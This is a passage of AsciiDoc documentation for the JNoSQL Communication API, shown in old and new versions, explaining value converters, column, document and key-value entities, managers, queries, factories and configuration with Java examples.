`Set`, `Queue`, and `Map`.\n\n\n[source,java]\n----\nList<String> list = bucketManager.getList(\"list\", String.class);\nSet<String> set = bucketManager.getSet(\"set\", String.class);\nQueue<String> queue = bucketManager.getQueue(\"queue\", String.class);\nMap<String, String> map = bucketManager.getMap(\"map\", String.class, String.class);\n----\n\nThese methods may throw a `java.lang.UnsupportedOperationException` if the database does not support any of the structures.
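A defensive sketch for providers that lack one of these structures:\n\n[source,java]\n----\ntry {\n Queue<String> queue = bucketManager.getQueue(\"queue\", String.class);\n} catch (UnsupportedOperationException exp) {\n \/\/ this provider does not support Queue; fall back to another structure\n}\n----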
=== Configuration\n\n\nThe configuration classes create a Manager Factory. This class has all the configuration to build the database connection.\n\nSince there is a large diversity of configuration flavors, such as P2P, master\/slave, Thrift communication, HTTP, etc., the implementation may be different; however, they all have a method to return a Manager Factory. It is recommended that all database driver providers have a properties file to read this startup information.\n\n\n==== Settings\n\nThe Settings interface represents the settings used in a configuration. It extends a `Map<String, Object>`; for this reason, any value can be set as configuration under a key.\n\n[source,java]\n----\nSettings settings = Settings.builder().put(\"key\", \"value\").build();\nMap<String, Object> map = ....;\nSettings settings = Settings.of(map);\n----\n\n\n==== Document Configuration\n\nOn the document collection configuration, there are two classes, `DocumentConfiguration` and `DocumentConfigurationAsync`, which create `DocumentCollectionManagerFactory` and `DocumentCollectionManagerAsyncFactory`, respectively.\n\n[source,java]\n----\nDocumentConfiguration configuration = \/\/instance\nDocumentConfigurationAsync configurationAsync = \/\/instance\nDocumentCollectionManagerFactory managerFactory = configuration.get();\nDocumentCollectionManagerAsyncFactory managerAsyncFactory = configurationAsync.getAsync();\n----\n\nIf a database has support for both synchronous and asynchronous operations, it may use `UnaryDocumentConfiguration`, which implements both document configurations.\n\n[source,java]\n----\nUnaryDocumentConfiguration unaryDocumentConfiguration = \/\/instance\nDocumentCollectionManagerFactory managerFactory = unaryDocumentConfiguration.get();\nDocumentCollectionManagerAsyncFactory managerAsyncFactory = unaryDocumentConfiguration.getAsync();\n----\n\n==== Column Configuration\n\nOn the column family configuration, there are two classes, `ColumnConfiguration` and `ColumnConfigurationAsync`, which create `ColumnFamilyManagerFactory` and `ColumnFamilyManagerAsyncFactory`, respectively.\n\n[source,java]\n----\nColumnConfiguration configuration = \/\/instance\nColumnConfigurationAsync configurationAsync = \/\/instance\nColumnFamilyManagerFactory managerFactory = configuration.get();\nColumnFamilyManagerAsyncFactory managerAsyncFactory = configurationAsync.getAsync();\n----\n\nIf a database has support for both synchronous and asynchronous operations, it may use `UnaryColumnConfiguration`, which implements both column configurations.\n\n[source,java]\n----\nUnaryColumnConfiguration unaryDocumentConfiguration = \/\/instance\nColumnFamilyManagerFactory managerFactory = unaryDocumentConfiguration.get();\nColumnFamilyManagerAsyncFactory managerAsyncFactory = unaryDocumentConfiguration.getAsync();\n----\n\n==== Key Value Configuration\n\n\nOn the key-value configuration, there is `KeyValueConfiguration`, which creates `BucketManagerFactory`.\n\n[source,java]\n----\nKeyValueConfiguration configuration = \/\/instance\nBucketManagerFactory managerFactory = configuration.get();\n----\n\n=== The diversity on NoSQL database\n\nIn the NoSQL world, beyond the several types, it is common for a particular database to have features that only exist on that provider. When there is a change between types, such as column family and document collection, there is a considerable change. Notably, even with a switch within the same kind, such as column family to column family, e.g., Cassandra to HBase, the same problem exists, since Cassandra has features such as the Cassandra Query Language and consistency levels. The communication API embraces this variety in NoSQL databases. The configuration classes and the factories return specialized classes from a provider.\n\n[source,java]\n----\n public interface ColumnFamilyManagerFactory<SYNC extends ColumnFamilyManager> extends AutoCloseable {\n SYNC get(String database);\n}\n----\n\nA `ColumnFamilyManagerFactory` returns a class that implements `ColumnFamilyManager`. 
E.g.: Using a particular resource from Cassandra driver.\n\n[source,java]\n----\nCassandraConfiguration condition = new CassandraConfiguration();\ntry(CassandraDocumentEntityManagerFactory managerFactory = condition.get()) {\n CassandraColumnFamilyManager columnEntityManager = managerFactory.get(KEY_SPACE);\n ColumnEntity entity = ColumnEntity.of(COLUMN_FAMILY);\n Column id = Column.of(\"id\", 10L);\n entity.add(id);\n entity.add(Column.of(\"version\", 0.001));\n entity.add(Column.of(\"name\", \"Diana\"));\n entity.add(Column.of(\"options\", Arrays.asList(1, 2, 3)));\n columnEntityManager.save(entity);\n \/\/common implementation\n ColumnQuery query = ColumnQuery.of(COLUMN_FAMILY);\n query.and(ColumnCondition.eq(id));\n Optional<ColumnEntity> result = columnEntityManager.singleResult(query);\n \/\/cassandra implementation\n columnEntityManager.save(entity, ConsistencyLevel.THREE);\n List<ColumnEntity> entities = columnEntityManager.cql(\"select * from newKeySpace.newColumnFamily\");\n System.out.println(entities);\n}\n----","old_contents":"\/\/\n\/\/ Copyright (c) 2018 Ot\u00e1vio Santana and others\n\/\/ All rights reserved. This program and the accompanying materials\n\/\/ are made available under the terms of the Eclipse Public License v1.0\n\/\/ and Apache License v2.0 which accompanies this distribution.\n\/\/ The Eclipse Public License is available at http:\/\/www.eclipse.org\/legal\/epl-v10.html\n\/\/ and the Apache License v2.0 is available at http:\/\/www.opensource.org\/licenses\/apache2.0.php.\n\/\/\n\/\/ You may elect to redistribute this code under either of these licenses.\n\/\/\n\/\/ Contributors:\n\/\/\n\/\/ Otavio Santana\n\n== Communication API Introduction\n\n\nWith the strategy to divide and conquer on JNoSQL, the communication API was born. It has the goal to make the communication layer easy and extensible. The extensibility is more than important, that is entirely necessary once the API must support specific feature in each database. Nonetheless, the advantage of a common API in a change to another database provider has lesser than using the specific API.\n\nTo cover the three kinds of database, this API has three packages, one for each database.\n\n* `org.jnosql.column`\n* `org.jnosql.document`\n* `org.jnosql.key`\n\nIMPORTANT: The package name might change on the Jakarta EE process.\n\nThere isn't a communication API because of the Graph API already does exist, that is link:http:\/\/tinkerpop.apache.org\/[Apache TinkerPop].\n\nSo, if a database is multi-model, has support to more than one database, it will implement an API to each database which it supports. Also, each API has the TCK to prove if the database is compatible with the API. Even from different NoSQL types, it tries to use the same nomenclature:\n\n* Configuration\n* Factory\n* Manager\n* Entity\n* Value\n\n=== The API structure\n\nThe communication has four projects:\n\n* The *communication-core*: The JNoSQL API communication common to all types.\n* The *communication-key-value*: The JNoSQL communication API layer to key-value database.\n* The *communication-column*: The JNoSQL communication API layer to column database.\n* The *communication-document*: The JNoSQL communication API layer to document database.\n\nEach module works separately; thereby, a NoSQL vendor just needs to implement the specific type, e.g., a key-value provider will apply a key-value API. If a NoSQL already has a driver, this API can work as an adapter with the current one. 
To multi-model NoSQL, providers will implement the API which they need.\n\nWARNING: To the Graph communication API, there is the link:http:\/\/tinkerpop.apache.org\/[Apache TinkerPop] that won\u2019t be covered in this documentation.\n\n\n=== Value\n\nThis interface represents the value that will store, that is a wrapper to be a bridge between the database and the application. E.g. If a database does not support a Java type, it may do the conversion with ease.\n\n[source,java]\n----\nValue value = Value.of(12);\n----\n\nThe Value interface has the methods:\n\n* `Object get();` Returns the value as Object\n\n* `<T> T get(Class<T> clazz);` Does the conversion process to the required type that is the safer way to do it. If the type required doesn\u2019t have support, it will throw an exception, although the API allows to create custom converters.\n\n* `<T> T get(TypeSupplier<T> typeSupplier);` Similar to the previous method, it does the conversion process but using a structure that uses generics such as List, Map, Stream and Set.\n\n[source,java]\n----\nValue value = Value.of(12);\nString string = value.get(String.class);\nList<Integer> list = value.get(new TypeReference<List<Integer>>() {});\nSet<Long> set = value.get(new TypeReference<Set<Long>>() {});\nStream<Integer> stream = value.get(new TypeReference<Stream<Integer>>() {});\nObject integer = value.get();\n----\n\n==== Make custom Writer and Reader\n\nAs mentioned before, the `Value` interface is to store the cost information into a database. The API already has support to the Java type such as primitive types, wrappers types, new Java 8 date time. Furthermore, the developer can create a custom converter easily and quickly. It has two interfaces:\n\n\n* `ValueWriter`: This interface represents a `Value` instance to write in a database.\n* `ValueReader`: This interface represents how the `Value` will convert to Java application. This interface will use the `<T> T get(Class<T> clazz)` and <T> T `get(TypeSupplier<T> typeSupplier)`.\n\nBoth class implementations load from Java SE ServiceLoader resource. So, to Communication API learn a new type, just register on ServiceLoader, e.g., Given a Money type:\n\n[source,java]\n----\npublic class Money {\n\n private final String currency;\n\n private final BigDecimal value;\n\n Money(String currency, BigDecimal value) {\n this.currency = currency;\n this.value = value;\n }\n\n public String getCurrency() {\n return currency;\n }\n\n public BigDecimal getValue() {\n return value;\n }\n\n @Override\n public String toString() {\n return currency + ' ' + value;\n }\n\n public static Money parse(String text) {\n String[] texts = text.split(\" \");\n return new Money(texts[0], BigDecimal.valueOf(Double.valueOf(texts[1])));\n }\n}\n----\n\nJust to be more didactic, the book creates a simple money representation. As everyone knows, that is not a good practice reinventing the wheel, so in production, the Java Developer must use mature Money APIs such as link:https:\/\/github.com\/JavaMoney[Moneta] that is the reference implementation of link:https:\/\/jcp.org\/en\/jsr\/detail?id=354[JSR 354].\n\nThe first step is to create the converter to a custom type database, the `ValueWriter`. 
It has two methods:\n\n* `boolean isCompatible(Class clazz)`: Check if the given class has support for this implementation.\n* `S write(T object)`: Once the implementation supports the type, the next step converts a `T` instance to `S` type.\n\n\n[source,java]\n----\npublic class MoneyValueWriter implements ValueWriter<Money, String> {\n\n @Override\n public boolean isCompatible(Class clazz) {\n return Money.class.equals(clazz);\n }\n\n @Override\n public String write(Money money) {\n return money.toString();\n }\n}\n----\n\nWith the `MoneyValueWriter` created and the Money type will save as String, then the next step is read information to Java application. As can be seen, a `ValueReader` implementation. This interface has two methods:\n\n* `boolean isCompatible(Class clazz)`; Check if the given class has support for this implementation.\n* `<T> T read(Class<T> clazz, Object value)`; Converts to the `T` type from Object instance.\n\n[source,java]\n----\npublic class MoneyValueReader implements ValueReader {\n\n @Override\n public boolean isCompatible(Class clazz) {\n return Money.class.equals(clazz);\n }\n\n @Override\n public <T> T read(Class<T> clazz, Object value) {\n return (T) Money.parse(value.toString());\n }\n}\n----\n\nAfter both implementations are done, the last step is to register them into two files:\n\n* `META-INF\/services\/org.jnosql.ValueReader`\n* `META-INF\/services\/org.jnosql.ValueWriter`\n\nEach file will have the qualifier of this respective implementation:\n\nThe file `org.jnosql.ValueReader` will have:\n\n```\nmy.company.MoneyValueReader\n```\n\nThe file `org.jnosql.ValueWriter` will have:\n\n```\nmy.company.MoneyValueWriter\n```\n\n[source,java]\n----\nValue value = Value.of(\"BRL 10.0\");\nMoney money = value.get(Money.class);\nList<Money> list = value.get(new TypeReference<List<Money>>() {});\nSet<Money> set = value.get(new TypeReference<Set<Money>>() {});;\n----\n\n\n=== Element Entity\n\nThe *Element entity* is a small piece of a body, except a key-value structure type, once this structure is simple. E.g. The column family structure, the entity has columns, element entity with column has a tuple where the key is the name, and the value is the information as a `Value` implementation.\n\n* *Document*\n* *Column*\n\n\n==== Document\n\nThe `Document` is a small piece of a Document entity. Each document has a tuple where the key is the document name, and the value is the information itself as `Value`.\n\n[source,java]\n----\nDocument document = Document.of(\"name\", \"value\");\nValue value = document.getValue();\nString name = document.getName();\n----\n\nThe document might have another document inside; the subdocument concept.\n\n[source,java]\n----\nDocument subDocument = Document.of(\"subDocument\", document);\n----\n\nThe way to store information in subdocuments will also depend on each driver's implementation.\n\nTo access the information from `Document`, it has an alias method to `Value`; in other words, it does a conversion directly from `Document` _interface_.\n\n[source,java]\n----\nDocument age = Document.of(\"age\", 29);\nString ageString = age.get(String.class);\nList<Integer> ages = age.get(new TypeReference<List<Integer>>() {});\nObject ageObject = age.get();\n----\n\n\n==== Column\n\nThe Column is a small piece of the column family entity. 
Each column has a tuple where the name represents a key and the value itself as a `Value` implementation.\n\n[source,java]\n----\nColumn document = Column.of(\"name\", \"value\");\nValue value = document.getValue();\nString name = document.getName();\n----\n\nWith this interface, we may have a column inside a column.\n\n\n[source,java]\n----\nColumn subColumn = Column.of(\"subColumn\", column);\n----\n\nThe way to store a subcolumn will also depend on each driver's implementation as well as the information.\n\nTo access the information from `Column`, it has an alias method to `Value`; thus, you can do a conversion directly from `Column` _interface_.\n\n[source,java]\n----\nColumn age = Column.of(\"age\", 29);\nString ageString = age.get(String.class);\nList<Integer> ages = age.get(new TypeReference<List<Integer>>() {});\nObject ageObject = age.get();\n----\n\n=== Entity\n\nThe Entity is the body of the information that goes to the database; each database has an Entity:\n\n* ColumnEntity\n* DocumentEntity\n* KeyValueEntity\n\n==== ColumnFamilyEntity\n\nThe `ColumnFamilyEntity` is an entity to column family database type. It is composed of one or more columns. As a result, the Column is a tuple of name and value.\n\n[source,java]\n----\nColumnEntity entity = ColumnEntity.of(\"columnFamily\");\nentity.add(Column.of(\"id\", Value.of(10L)));\nentity.add(Column.of(\"version\", 0.001));\nentity.add(Column.of(\"name\", \"Diana\"));\nentity.add(Column.of(\"options\", Arrays.asList(1, 2, 3)));\n\nList<Column> columns = entity.getColumns();\nOptional<Column> id = entity.find(\"id\");\n----\n\n==== DocumentEntity\n\nThe `DocumentEntity` is an entity to document collection database type. It is composed of one or more documents. As a result, the Document is a tuple of name and value.\n\n[source,java]\n----\nDocumentEntity entity = DocumentEntity.of(\"documentFamily\");\nString name = entity.getName();\nentity.add(Document.of(\"id\", Value.of(10L)));\nentity.add(Document.of(\"version\", 0.001));\nentity.add(Document.of(\"name\", \"Diana\"));\nentity.add(Document.of(\"options\", Arrays.asList(1, 2, 3)));\n\nList<Document> documents = entity.getDocuments();\nOptional<Document> id = entity.find(\"id\");\nentity.remove(\"options\");\n----\n\n==== KeyValueEntity\n\nThe `KeyValueEntity` is the simplest structure; it has a tuple and a key-value structure. As the previous entity, it has direct access to information using alias method to `Value`.\n\n[source,java]\n----\nKeyValueEntity<String> entity = KeyValueEntity.of(\"key\", Value.of(123));\nKeyValueEntity<Integer> entity2 = KeyValueEntity.of(12, \"Text\");\nString key = entity.getKey();\nValue value = entity.getValue();\nInteger integer = entity.get(Integer.class);\n----\n\n\n=== Manager\n\nThe Manager is the class that pushes information to a database and retrieves it. 
The manager might have a synchronous and asynchronous implementation.\n\n\n* *DocumentCollectionManager*\n* *DocumentCollectionManagerAsync*\n* *ColumnConfiguration*\n* *ColumnConfigurationAsync*\n* *BucketManager*\n\n==== Document Manager\n\nThe manager class to a document type can be synchronous or asynchronous:\n\n* *DocumentCollectionManager*: To do synchronous operations.\n* *DocumentCollectionManagerAsync*: To do asynchronous operations.\n\n===== DocumentCollectionManager\n\nThe `DocumentCollectionManager` is the class that manages the persistence on the synchronous way to document collection.\n\n[source,java]\n----\nDocumentEntity entity = DocumentEntity.of(\"collection\");\nDocument diana = Document.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<DocumentEntity> entities = Collections.singletonList(entity);\nDocumentCollectionManager manager = \/\/instance;\n\/\/insert operations\nmanager.insert(entity);\nmanager.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanager.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanager.update(entity);\nmanager.update(entities);\n----\n\n===== DocumentCollectionManagerAsync\n\nThe `DocumentCollectionManagerAsync` is the class that manages the persistence on an asynchronous way to document collection.\n\n[source,java]\n----\nDocumentEntity entity = DocumentEntity.of(\"collection\");\nDocument diana = Document.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<DocumentEntity> entities = Collections.singletonList(entity);\nDocumentCollectionManagerAsync managerAsync = \/\/instance\n\n\/\/insert operations\nmanagerAsync.insert(entity);\nmanagerAsync.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanagerAsync.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanagerAsync.update(entity);\nmanagerAsync.update(entities);\n----\n\nSometimes on an asynchronous process, it's important to know when this process is over, so the `DocumentCollectionManagerAsync` also has callback support.\n\n[source,java]\n----\nConsumer<DocumentEntity> callBack = e -> {};\nmanagerAsync.insert(entity, callBack);\nmanagerAsync.update(entity, callBack);\n----\n\n===== Search information on a document collection\n\nThe Document Communication API has support to retrieve information from both ways; synchronous and asynchronous, from the `DocumentQuery` class. The `DocumentQuery` has information such as sort type, document, and also the condition to retrieve information.\n\nThe condition on `DocumentQuery` is given from `DocumentCondition`, which has the status and the document. E.g. The condition behind is to find a name equal \"**Ada**\".\n[source,java]\n----\nDocumentCondition nameEqualsAda = DocumentCondition.eq(Document.of(\"name\", \u201cAda\u201d));\n----\n\nAlso, the developer can use the aggregators such as **AND**, **OR**, and **NOT**.\n\n[source,java]\n----\nDocumentCondition nameEqualsAda = DocumentCondition.eq(Document.of(\"name\", \"Ada\"));\nDocumentCondition youngerThan2Years = DocumentCondition.lt(Document.of(\"age\", 2));\nDocumentCondition condition = nameEqualsAda.and(youngerThan2Years);\nDocumentCondition nameNotEqualsAda = nameEqualsAda.negate();\n----\n\nIf there isn\u2019t a condition in the query, that means the query will try to retrieve all information from the database, similar to a \u201c`select * from database`\u201d in a relational database, just remembering that the return depends on the driver. 
It is important to say that not all NoSQL databases have support for this resource.\n`DocumentQuery` also has pagination feature to define where the data starts, and its limits.\n\n[source,java]\n----\nDocumentCollectionManager manager = \/\/instance;\nDocumentCollectionManagerAsync managerAsync = \/\/instance;\nDocumentQuery query = DocumentQueryBuilder.select().from(\"collection\").where(\"age\").lt(10).and(\"name\").eq(\"Ada\").orderBy(\"name\").asc().limit(10).skip(2).build();\nList<DocumentEntity> entities = manager.select(query);\nOptional<DocumentEntity> entity = manager.singleResult(query);\nConsumer<List<DocumentEntity>> callback = e -> {};\nmanagerAsync.select(query, callback);\n----\n\n===== Removing information from Document Collection\n\nSuch as `DocumentQuery`, there is a class to remove information from the document database type: A `DocumentDeleteQuery` type.\n\nIt is smoother than `DocumentQuery` because there isn\u2019t pagination and sort feature, once this information is unnecessary to remove information from database.\n\n[source,java]\n----\nDocumentCollectionManager manager = \/\/instance;\nDocumentCollectionManagerAsync managerAsync = \/\/instance;\nDocumentDeleteQuery query = DocumentQueryBuilder.delete().from(\"collection\").where(\"age\").gt(10).build();\nmanager.delete(query);\nmanagerAsync.delete(query);\nmanagerAsync.delete(query, v -> {});\n----\n\n==== Column Manager\n\nThe Manager class for the column family type can be synchronous or asynchronous:\n\n* *ColumnFamilyManager*: To do synchronous operations.\n* *ColumnFamilyManagerAsync*: To do asynchronous operations.\n\n===== ColumnFamilyManager\n\nThe `ColumnFamilyManager` is the class that manages the persistence on the synchronous way to column family.\n\n[source,java]\n----\nColumnEntity entity = ColumnEntity.of(\"columnFamily\");\nColumn diana = Column.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<ColumnEntity> entities = Collections.singletonList(entity);\nColumnFamilyManager manager = \/\/instance;\n\n\/\/inserts operations\nmanager.insert(entity);\nmanager.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanager.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanager.update(entity);\nmanager.update(entities);\n----\n\n===== ColumnFamilyManagerAsync\n\nThe `ColumnFamilyManagerAsync` is the class that manages the persistence on the asynchronous way to column family.\n\n[source,java]\n----\nColumn diana = Column.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<ColumnEntity> entities = Collections.singletonList(entity);\nColumnFamilyManagerAsync managerAsync = null;\n\n\/\/inserts operations\nmanagerAsync.insert(entity);\nmanagerAsync.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanagerAsync.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanagerAsync.update(entity);\nmanagerAsync.update(entities);\n----\n\nSometimes on an asynchronous process, is important to know when this process is over, so the `ColumnFamilyManagerAsync` also has callback support.\n\n[source,java]\n----\nConsumer<ColumnEntity> callBack = e -> {};\nmanagerAsync.insert(entity, callBack);\nmanagerAsync.update(entity, callBack);\n----\n\n===== Search information on a column family\n\n\nThe Column communication API has support to retrieve information from both ways synchronous and asynchronous from the `ColumnQuery` class. 
The `ColumnQuery` has information such as sort type, document and also the condition to retrieve information.\n\nThe condition on `ColumnQuery` is given from ColumnCondition, which has the status and the column. E.g. The condition behind is to find a name equal \"**Ada**\".\n[source,java]\n----\nColumnCondition nameEqualsAda = ColumnCondition.eq(Column.of(\"name\", \u201cAda\u201d));\n----\n\nAlso, the developer can use the aggregators such as **AND**, **OR**, and **NOT**.\n\n[source,java]\n----\nColumnCondition nameEqualsAda = ColumnCondition.eq(Column.of(\"name\", \"Ada\"));\nColumnCondition youngerThan2Years = ColumnCondition.lt(Column.of(\"age\", 2));\nColumnCondition condition = nameEqualsAda.and(youngerThan2Years);\nColumnCondition nameNotEqualsAda = nameEqualsAda.negate();\n----\n\nIf there isn\u2019t condition at the query, that means the query will try to retrieve all information from the database, look like a \u201c`select * from database`\u201d in a relational database, just to remember the return depends on from driver. It is important to say that not all NoSQL databases have support for this resource.\n\n`ColumnQuery` also has pagination feature to define where the data starts, and its limits.\n\n[source,java]\n----\nColumnFamilyManager manager = \/\/instance;\nColumnFamilyManagerAsync managerAsync = \/\/instance;\nColumnQuery query = ColumnQuery query = ColumnQueryBuilder.select().from(\"collection\").where(\"age\").lt(10).and(\"name\").eq(\"Ada\").orderBy(\"name\").asc().limit(10).skip(2).build();\n\nList<ColumnEntity> entities = manager.select(query);\nOptional<ColumnEntity> entity = manager.singleResult(query);\n\nConsumer<List<ColumnEntity>> callback = e -> {};\nmanagerAsync.select(query, callback);\n----\n\n===== Removing information from Column Family\n\nSuch as `ColumnQuery`, there is a class to remove information from the column database type: A `ColumnDeleteQuery` type.\n\nIt is smoother than `ColumnQuery` because there isn\u2019t pagination and sort feature, once this information is unnecessary to remove information from database.\n\n[source,java]\n----\nColumnFamilyManager manager = \/\/instance;\nColumnFamilyManagerAsync managerAsync = \/\/instance;\n\nColumnDeleteQuery query = ColumnQueryBuilder.delete()\n .from(\"collection\").where(\"age\").gt(10).build();\n\nmanager.delete(query);\n\nmanagerAsync.delete(query);\nmanagerAsync.delete(query, v -> {});\n----\n\n\n==== BucketManager\n\nThe `BucketManager` is the class which saves the KeyValueEntity on a synchronous way in key-value database.\n\n[source,java]\n----\nBucketManager bucketManager= null;\nKeyValueEntity<String> entity = KeyValueEntity.of(\"key\", 1201);\nSet<KeyValueEntity<String>> entities = Collections.singleton(entity);\nbucketManager.put(\"key\", \"value\");\nbucketManager.put(entity);\nbucketManager.put(entities);\nbucketManager.put(entities, Duration.ofHours(2));\/\/two hours TTL\nbucketManager.put(entity, Duration.ofHours(2));\/\/two hours TTL\n----\n\n===== Removing and retrieve information from a key-value database\n\nWith a simple structure, the bucket needs a key to both retrieve and delete information from the database.\n\n[source,java]\n----\nOptional<Value> value = bucketManager.get(\"key\");\nIterable<Value> values = bucketManager.get(Collections.singletonList(\"key\"));\nbucketManager.remove(\"key\");\nbucketManager.remove(Collections.singletonList(\"key\"));\n----\n\ninclude::communication_query.adoc[]\n\n=== Factory\n\nThe factory class creates the *Managers*.\n\n* 
\ninclude::communication_query.adoc[]\n\n=== Factory\n\nThe factory classes create the *Managers*.\n\n* *ColumnFamilyManagerAsyncFactory*\n* *ColumnFamilyManagerFactory*\n* *BucketManagerFactory*\n* *DocumentCollectionManagerFactory*\n* *DocumentCollectionManagerAsyncFactory*\n\n\n==== Column Family Manager Factory\n\nThe factory classes are responsible for creating the column family manager.\n\n* *ColumnFamilyManagerAsyncFactory*\n* *ColumnFamilyManagerFactory*\n\nThe `ColumnFamilyManagerFactory` and `ColumnFamilyManagerAsyncFactory` create the manager synchronously and asynchronously, respectively.\n\n[source,java]\n----\nColumnFamilyManagerFactory factory = \/\/instance\nColumnFamilyManagerAsyncFactory asyncFactory = \/\/instance\nColumnFamilyManager manager = factory.get(\"database\");\nColumnFamilyManagerAsync managerAsync = asyncFactory.getAsync(\"database\");\n----\n\nThe factories were separated intentionally, as not all databases support synchronous and asynchronous operations.\n\n==== Document Collection Factory\n\nThe factory classes are responsible for creating the document collection manager.\n\n* *DocumentCollectionManagerFactory*\n* *DocumentCollectionManagerAsyncFactory*\n\nThe `DocumentCollectionManagerFactory` and `DocumentCollectionManagerAsyncFactory` create the manager synchronously and asynchronously, respectively.\n\n[source,java]\n----\nDocumentCollectionManagerFactory factory = \/\/instance\nDocumentCollectionManagerAsyncFactory asyncFactory = \/\/instance\nDocumentCollectionManager manager = factory.get(\"database\");\nDocumentCollectionManagerAsync managerAsync = asyncFactory.getAsync(\"database\");\n----\n\nThe factories were separated intentionally, as not all databases support synchronous and asynchronous operations.\n\n==== Bucket Manager Factory\n\nThe factory classes are responsible for creating the bucket manager.\n\n\n[source,java]\n----\nBucketManagerFactory bucketManager = \/\/instance\nBucketManager bucket = bucketManager.getBucketManager(\"bucket\");\n----\n\nBeyond the BucketManager, some databases have support for particular structures represented in the Java world such as `List`, `Set`, `Queue`, and `Map`.\n\n\n[source,java]\n----\nList<String> list = bucketManager.getList(\"list\", String.class);\nSet<String> set = bucketManager.getSet(\"set\", String.class);\nQueue<String> queue = bucketManager.getQueue(\"queue\", String.class);\nMap<String, String> map = bucketManager.getMap(\"map\", String.class, String.class);\n----\n\nThese methods may throw a `java.lang.UnsupportedOperationException` if the database does not support any of the structures.
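\nFor instance, a caller can guard against providers that do not implement one of these structures. A minimal sketch, reusing the `bucketManager` factory instance from the example above:\n\n[source,java]\n----\ntry {\n    List<String> names = bucketManager.getList(\"names\", String.class);\n    names.add(\"Ada\");\n} catch (UnsupportedOperationException exception) {\n    \/\/fall back to plain key-value operations when the driver does not support the List structure\n}\n----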
\n=== Configuration\n\n\nThe configuration classes create a Manager Factory. This class has all the configuration to build the database connection.\n\nSince there is a large diversity of configuration flavors, such as P2P, master\/slave, Thrift communication, HTTP, etc., the implementations may differ; however, they all have a method that returns a Manager Factory. It is recommended that all database driver providers have a properties file to read this startup information.\n\n\n==== Settings\n\nThe Settings interface represents the settings used in a configuration. It extends `Map<String, Object>`; for this reason, any value can be set as configuration under a given key.\n\n[source,java]\n----\nSettings settings = Settings.builder().put(\"key\", \"value\").build();\nMap<String, Object> map = ....;\nSettings settingsFromMap = Settings.of(map);\n----\n\n\n==== Document Configuration\n\nOn the document collection configuration, there are two classes, `DocumentConfiguration` and `DocumentConfigurationAsync`, for `DocumentCollectionManagerFactory` and `DocumentCollectionManagerAsyncFactory`, respectively.\n\n[source,java]\n----\nDocumentConfiguration configuration = \/\/instance\nDocumentConfigurationAsync configurationAsync = \/\/instance\nDocumentCollectionManagerFactory managerFactory = configuration.get();\nDocumentCollectionManagerAsyncFactory managerAsyncFactory = configurationAsync.getAsync();\n----\n\nIf a database supports both synchronous and asynchronous operations, it may use `UnaryDocumentConfiguration`, which implements both document configurations.\n\n[source,java]\n----\nUnaryDocumentConfiguration unaryDocumentConfiguration = \/\/instance\nDocumentCollectionManagerFactory managerFactory = unaryDocumentConfiguration.get();\nDocumentCollectionManagerAsyncFactory managerAsyncFactory = unaryDocumentConfiguration.getAsync();\n----\n\n==== Column Configuration\n\nOn the column family configuration, there are two classes, `ColumnConfiguration` and `ColumnConfigurationAsync`, for `ColumnFamilyManagerFactory` and `ColumnFamilyManagerAsyncFactory`, respectively.\n\n[source,java]\n----\nColumnConfiguration configuration = \/\/instance\nColumnConfigurationAsync configurationAsync = \/\/instance\nColumnFamilyManagerFactory managerFactory = configuration.get();\nColumnFamilyManagerAsyncFactory managerAsyncFactory = configurationAsync.getAsync();\n----\n\nIf a database supports both synchronous and asynchronous operations, it may use `UnaryColumnConfiguration`, which implements both column configurations.\n\n[source,java]\n----\nUnaryColumnConfiguration unaryColumnConfiguration = \/\/instance\nColumnFamilyManagerFactory managerFactory = unaryColumnConfiguration.get();\nColumnFamilyManagerAsyncFactory managerAsyncFactory = unaryColumnConfiguration.getAsync();\n----\n\n==== Key Value Configuration\n\n\nOn the key-value configuration, there is `KeyValueConfiguration` for `BucketManagerFactory`.\n\n[source,java]\n----\nKeyValueConfiguration configuration = \/\/instance\nBucketManagerFactory managerFactory = configuration.get();\n----\n\n=== The diversity of NoSQL databases\n\nIn the NoSQL world, beyond the several types, it is common for a particular database to have features that exist only in that provider. When there is a change between types, such as from column family to document collection, there is a considerable difference. Notably, even a switch within the same kind, such as column family to column family, e.g., Cassandra to HBase, faces the same problem, since Cassandra has features such as the Cassandra Query Language and consistency levels. The communication API embraces this variety in NoSQL databases: the configuration classes and entity factories may return a specialized class from a provider.\n\n[source,java]\n----\npublic interface ColumnFamilyManagerFactory<SYNC extends ColumnFamilyManager> extends AutoCloseable {\n    SYNC get(String database);\n}\n----\n\nA `ColumnFamilyManagerFactory` returns a class that implements `ColumnFamilyManager`.
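\nTo illustrate the generic parameter, here is a hedged sketch of how a hypothetical provider could specialize the factory (the `Foo` names are illustrative only, not a real driver API):\n\n[source,java]\n----\n\/\/hypothetical provider types, for illustration only\ninterface FooColumnFamilyManager extends ColumnFamilyManager {\n}\n\ninterface FooColumnFamilyManagerFactory extends ColumnFamilyManagerFactory<FooColumnFamilyManager> {\n    @Override\n    FooColumnFamilyManager get(String database);\n}\n----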
